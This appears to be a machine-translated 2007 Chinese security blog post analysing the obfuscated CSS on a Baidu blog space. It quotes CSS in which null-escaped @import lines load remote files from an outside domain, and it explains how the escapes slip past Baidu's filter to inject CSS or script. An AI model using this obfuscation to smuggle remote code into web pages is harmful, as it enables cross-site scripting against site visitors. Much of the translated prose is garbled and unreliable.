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HistoryJun 18, 2007 - 12:00 a.m.

Parse edikid's blog the CSS“encryption”technology-vulnerability warning-the black bar safety net


From I released Baidu CSS import vulnerability the beginning, people constantly ask me about the http://hi. baidu. com/edikid this space, and now there may be hundreds of people! I once said that CSS content is, in principle, can not be encrypted-the reason is that it needs to be browser resolution. But when everyone use my http://dohi. cn/hisearchcss. asp to his space CSS for viewing when seeing is garbled, it seems that he created a miracle.

Here Monyer not their own, as well as the technology to doany discussion or evaluation, only his CSS to do some basic analysis, after everyone experiencing this problem don’t fret.

The first column of its space to the CSS code

@ODY%7@@ACKGROUND%3A%23FFCC00%3@WIDTH%3A100%2 5% 3@OVERFLOW-X%3AHIDDEN%3@COLOR%3A%232FA4DE%7D%0D%0A%23HEADER%7@@ACKGROUND%3A%23CCFF66%3@HEIGHT%3A100PX%3@WIDTH%3A100%2 5%7D%0D%0AAD1%2CAD2%2CAD3%2CAD4%2CAD5%2CAD6%7@@ACKGROUND%3A%23FFCC00%3@COLOR%3A%232FA4D} @\0i\0m\0p\0o\0r\000t “\0h\0t\0t\0p://bl\0o\0g\0. ed\0i\0k\0id. ne\0t\0/\0h\0ibaidu/c\ \ 0s\0s.\ 0h\0t\0m\0l\0”;E%3@%7D%0D%0A%23LAYOUT%7@WIDTH%3A98%25%3@%7D%0D%0A%23LAYOUT%20TD.C3T1%-ARROW-COLOR%3A%20%23000000%3@%20%0D%0A%20%20%20%20SCROLL@AR-TRACK-COLOR%3A%20%23FFFFFF%3@%20%0D%0A%20%20%20%20SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND%3A%23FFCC00%3@WIDTH%3A100%25%3@OVERFLOW-X%3AHIDDEN%3@COLOR%3A%232FA4DE%7D%0D%0A%%3@%20%0D%0A%20%20%20%20SCROLL@AR-DARKSHADOW-COLOR%3A%20%23FFFFFF%3@%20%0D%0A%20%20%20%20SCROLL@AR-@ASE-COLOR%3A%20%23FFFFFF%3@;}@\0i\0m\0p\0o\0r\00t “h\0t\0t\000p:/\0/\0b\0l\0o\0g. e\0d\0i\0k\0i\0d. n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js. h\0t\0m\0l”;E%3@%7D%0D%0A%23LAYOUT%7@WIDTH%3A98%25%3@%7D%0D%0A%23LAYOUT%20TD.C3T1%-ARROW-COLOR%3A%20%23000000%3@%20%0D%0A%20%20%20%20SCROLL@AR-TRACK-COLOR%3A%20%23FFFFFF%3@%20%0D%0A%20%20%20%20SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND%3A%23FFCC00%3@WIDTH%3A100%25%3@OVERFLOW-X%3AHIDDEN%3@COLOR%3A%232FA4DE%7D%0D%0A%%3@%20%0D%0A%20%20%20%

To be honest, if the offset let me to these code say it herself, that’s not realistic, because even for all of you browser, in which most of the code is an invalid code, that is, no matter what you write, are not performed.

So the inside of the




Makes no sense, your willing to write what to write what, as long as the statement of the normal end of the can! This is also your anyway also not understand the reasons. Careful friends will find that I made one of the two codes, they are:

@\0i\0m\0p\0o\0r\000t “\0h\0t\0t\0p://bl\0o\0g\0. ed\0i\0k\0id. ne\0t\0/\0h\0ibaidu/c\ \ 0s\0s.\ 0h\0t\0m\0l\0”;
@\0i\0m\0p\0o\0r\00t “h\0t\0t\000p:/\0/\0b\0l\0o\0g. e\0d\0i\0k\0i\0d. n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js. h\0t\0m\0l”;

In the CSS.“\0”、“\00”、“\000” is will be the browser to ignore the other relevant CSS hacking, please refer to MonyerXSSseries, we remove the look:

@import “”;

For this couple, I think everyone familiar? Which not only can be placed is called the CSS code, but also can feel free to insert the js code we are not use it is inserted through video?)

But we put the author of all CSS all copy to us there is not successful, the reason is the import of the character and related to bypass the way had already been Baidu filtered, and the author is in the Baidu before filtering was added, and not modified, so still valid.


The first CSS call I have no analysis, because I test just the file cannot access the second one should not be executed, because the front of the confused statement is not very complete, this depends on your client what browser.

However, the previous analysis seems to remember which has a similar

<meta http-equiv=“refresh” content=“url=url,0”>

Such html The steering code. Due to the extension of the relationship, when you use the browser to directly access, the inside of the CSS won’t be executed, but will execute the embedded html or js code; when you use the import call, inside of the html and the script does not execute, but inside the CSS will perform. So you can only use Notepad to open, or flashget to download.

In fact, said so much, we are nothing more than the CSS on the spin, if to really understand what is CSS, and vital ground to think, I believe there would be so many problems appeared.

Finally gave everyone a word, is in one of my books on see: you have to ask someone is“why”, but not“how”to.

In a delphi tutorial on also seen this phrase, but:“learn WHY not remember HOW!”, and Want to give you some inspiration and help!

Lines of hasty, articles, inadequacies also please advise! Monyer

Another dream Shine Group【1】is already full, everyone please add dream light Group【2】, The number is 3 2 7 3 3 2 8, thanks to http://hi. baidu. com/my10 provide